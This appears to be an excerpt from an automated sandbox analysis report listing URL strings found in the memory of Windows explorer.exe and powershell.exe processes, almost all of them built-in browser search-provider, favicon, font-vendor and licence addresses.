            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 00000015.00000002.381486406.0000026700001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: powershell.exe, 00000015.00000003.309171435.0000026701057000.00000004.00000001.sdmp, explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.nifty.com/favicon.ico
